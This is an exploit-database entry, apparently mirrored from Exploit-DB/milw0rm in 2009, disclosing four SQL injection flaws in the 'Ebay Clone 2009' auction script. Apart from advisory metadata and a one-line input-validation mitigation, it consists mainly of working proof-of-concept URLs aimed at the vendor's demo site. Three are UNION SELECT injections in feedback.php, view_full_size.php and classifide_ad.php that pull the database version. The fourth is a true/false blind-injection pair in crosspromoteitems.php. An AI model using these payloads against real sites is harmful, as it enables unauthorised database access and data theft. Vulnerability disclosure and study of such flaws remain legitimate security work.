Ebay Clone 2009 Multiple SQL Injection Vulnerabilities

vendor:

Ebay Clone 2009

by:

MizoZ [EvilWay Team]

7,5

CVSS

HIGH

SQL Injection

CWE

Product Name: Ebay Clone 2009

Affected Version From: Ebay Clone 2009

Affected Version To: Ebay Clone 2009

Patch Exists: NO

Related CWE: N/A

CPE: ebayclonescript.com/ebayclone2009/

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

Ebay Clone 2009 Multiple SQL Injection Vulnerabilities

Multiple SQL Injection vulnerabilities were discovered in Ebay Clone 2009. The first vulnerability is located in the 'feedback.php' file with the 'user_id' parameter. The second vulnerability is located in the 'view_full_size.php' file with the 'item_id' parameter. The third vulnerability is located in the 'classifide_ad.php' file with the 'item_id' parameter. The fourth vulnerability is a Blind SQL Injection located in the 'crosspromoteitems.php' file with the 'item_id' parameter.

Mitigation:

Input validation should be used to prevent SQL Injection attacks.

Source

Exploit-DB raw data:

----------------------------------------------------------------------------------------------------

Name : Ebay Clone 2009 Multiple SQL Injection Vulnerabilities
Site : http://www.ebayclonescript.com/
Demo : http://ebayclonescript.com/ebayclone2009/

----------------------------------------------------------------------------------------------------


Found By : MizoZ [EvilWay Team]
Made in : Morocco
Contact : mizoz[at]9[dot]cn
Greetz : Moudi , Zuka , All friends


----------------------------------------------------------------------------------------------------

1st , SQL Injection (feedback.php GET(user_id)) :
http://ebayclonescript.com//ebayclone2009/feedback.php?user_id=368+union+select+1,2,3,version(),5,6,7,8--#footer

2nd , SQL Injection (view_full_size.php GET(item_id)) :
http://ebayclonescript.com/ebayclone2009/view_full_size.php?i=1&item_id=-2904+union+select+1,2,3,4,version(),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58--

3th , SQL Injection (classifide_ad.php GET(item_id)) :
http://ebayclonescript.com/ebayclone2009/classifide_ad.php?item_id=-2872+union+select+1,2,3,4,version(),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58--

4th , Blind SQL Injection (crosspromoteitems.php GET(item_id)) :
http://ebayclonescript.com/ebayclone2009/crosspromoteitems.php?item_id=2876+and+1=1--
!=
http://ebayclonescript.com/ebayclone2009/crosspromoteitems.php?item_id=2876+and+1=0--

----------------------------------------------------------------------------------------------------

# milw0rm.com [2009-07-11]